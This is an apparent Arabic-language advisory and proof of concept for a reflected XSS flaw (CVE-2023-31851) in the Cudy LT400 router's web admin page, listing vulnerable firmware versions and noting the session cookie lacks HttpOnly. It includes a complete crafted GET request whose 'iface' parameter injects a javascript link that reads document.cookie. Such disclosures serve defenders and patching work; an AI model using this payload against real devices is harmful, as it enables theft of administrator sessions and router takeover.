
إثبات مفهوم لـ XSS المنعكس في واجهة الويب Cudy LT400، مما يتيح سرقة رمز الجلسة عبر طلبات مبنية بدون مصادقة إلى /cgi-bin/luci/admin/network/wireless/status.
هجوم البرمجة النصية عبر المواقع (XSS) المنعكس موجود في واجهة الإدارة المستندة إلى الويب لجهاز Cudy LT400.
تحتوي الصفحة /cgi-bin/luci/admin/network/wireless/status على XSS منعكس عبر المعامل iface.
تتضمن طرق الاستغلال إرسال طلب مخصّص للضحية يحتوي على تعليمات برمجية خبيثة.
لا يقوم التطبيق المتأثر بتعيين Session Cookie مع السمة HttpOnly؛ مما قد يؤدي إلى الاستيلاء على صلاحيات المشرف عبر سرقة رمز الجلسة.
إصدارات البرامج الثابتة المعرّضة للخطر: 1.13.4 - 1.15.18 - 1.15.27
GET /cgi-bin/luci/admin/network/wireless/status?iface=wlan00%22%29%27%20href%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3Exss%3C%2Fa%3E HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31851